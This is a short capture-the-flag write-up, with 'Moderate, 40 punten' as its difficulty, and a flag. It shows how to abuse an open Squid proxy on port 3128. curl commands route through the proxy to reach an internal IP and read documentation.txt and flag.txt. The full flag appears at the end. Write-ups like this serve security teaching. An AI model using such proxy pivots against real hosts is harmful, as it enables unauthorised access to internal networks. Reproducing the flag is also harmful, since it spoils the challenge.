31 lines
997 B
Markdown
31 lines
997 B
Markdown
|
## Difficulty
|
||
|
|
|
||
|
|
Moderate
|
||
|
|
40 punten
|
||
|
|
|
||
|
|
## How to solve
|
||
|
|
|
||
|
|
When you open the webpage you will get a link to the flag, but unfortunately that links results in a `Forbidden` error. The second link on that webpage refers to some documentation page, but points to an internal IP address.
|
||
|
|
|
||
|
|
On the same IP address as the webserver, a process is running on port `3128`, this port is well known for hosting the caching proxy server "Squid". Trying to proxy requests to the documentation over "Squid" using:
|
||
|
|
|
||
|
|
```
|
||
|
|
$ curl -x http://IP\_OF\_CHALLENGE:3128 http://10.10.0.33/documentation.txt
|
||
|
|
```
|
||
|
|
|
||
|
|
reveals the content of the documentation site:
|
||
|
|
|
||
|
|
```
|
||
|
|
TODO: document infrastructure
|
||
|
|
```
|
||
|
|
|
||
|
|
This means that the proxy does not sufficiently protect its internal network it has access to. Therefore, we might be able to fetch the flag from the same IP address through the proxy:
|
||
|
|
|
||
|
|
```
|
||
|
|
$ curl -x http://IP\_OF\_CHALLENGE:3128 http://10.10.0.33/flag.txt
|
||
|
|
IGCTF{BeCarefulWithTheRules}
|
||
|
|
```
|
||
|
|
|
||
|
|
## Flag
|
||
|
|
IGCTF{BeCarefulWithTheRules}
|